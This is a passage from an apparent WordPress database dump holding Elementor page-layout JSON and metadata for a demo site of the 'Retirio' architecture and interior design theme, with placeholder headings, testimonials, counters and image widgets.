price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3137,4756,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3138,4756,'_elementor_pro_version','3.8.1'),(3139,4756,'_elementor_css','a:6:{s:4:\"time\";i:1685009889;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3140,4757,'_wp_page_template','elementor_header_footer'),(3141,4757,'_elementor_edit_mode','builder'),(3142,4757,'_elementor_template_type','wp-page'),(3143,4757,'_elementor_version','3.8.1'),(3144,4757,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":